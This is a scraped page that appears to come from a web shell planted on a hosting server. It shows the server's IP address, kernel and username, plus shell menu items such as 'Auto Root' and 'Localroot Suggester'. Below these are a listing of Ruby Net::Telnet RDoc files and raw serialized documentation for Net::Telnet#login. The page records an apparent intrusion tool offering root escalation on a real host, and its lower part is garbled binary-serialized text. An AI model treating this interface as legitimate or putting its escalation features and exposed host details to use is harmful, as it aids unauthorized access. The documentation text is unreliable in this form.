Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Net /
Telnet /
Delete
Unzip
Name
Size
Permission
Date
Action
binmode%3d-i.ri
329
B
-rw-r--r--
2023-07-26 17:38
binmode-i.ri
415
B
-rw-r--r--
2023-07-26 17:38
cdesc-Telnet.ri
4.37
KB
-rw-r--r--
2023-07-26 17:38
close-i.ri
291
B
-rw-r--r--
2023-07-26 17:38
cmd-i.ri
1.78
KB
-rw-r--r--
2023-07-26 17:38
login-i.ri
1.47
KB
-rw-r--r--
2023-07-26 17:38
new-c.ri
5.79
KB
-rw-r--r--
2023-07-26 17:38
preprocess-i.ri
629
B
-rw-r--r--
2023-07-26 17:38
print-i.ri
586
B
-rw-r--r--
2023-07-26 17:38
puts-i.ri
397
B
-rw-r--r--
2023-07-26 17:38
sock-i.ri
444
B
-rw-r--r--
2023-07-26 17:38
telnetmode%3d-i.ri
477
B
-rw-r--r--
2023-07-26 17:38
telnetmode-i.ri
565
B
-rw-r--r--
2023-07-26 17:38
waitfor-i.ri
2.54
KB
-rw-r--r--
2023-07-26 17:38
write-i.ri
463
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI" login:EFI"Net::Telnet#login;FF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I":Login to the host with a given username and password.;To:RDoc::Markup::BlankLine o; ; [I"DThe username and password can either be provided as two string ;TI"@arguments in that order, or as a hash with keys "Name" and ;TI""Password".;T@o; ; [ I"GThis method looks for the strings "login" and "Password" from the ;TI"Ghost to determine when to send the username and password. If the ;TI"Dlogin sequence does not follow this pattern (for instance, you ;TI"Care connecting to a service other than telnet), you will need ;TI"to handle login yourself.;T@o; ; [ I"1The password can be omitted, either by only ;TI"Gprovided one String argument, which will be used as the username, ;TI"For by providing a has that has no "Password" key. In this case, ;TI"Cthe method will not look for the "Password:" prompt; if it is ;TI"8sent, it will have to be dealt with by later calls.;T@o; ; [ I"HThe method returns all data received during the login process from ;TI"Ithe host, including the echoed username but not the password (which ;TI"Hthe host should not echo). If a block is passed in, this received ;TI"9data is also yielded to the block as it is received.;T: @fileI"lib/net/telnet.rb;T:0@omit_headings_from_table_of_contents_below00I" recvdata;F[ I"(options, password = nil);T@(FI"Telnet;FcRDoc::NormalClass0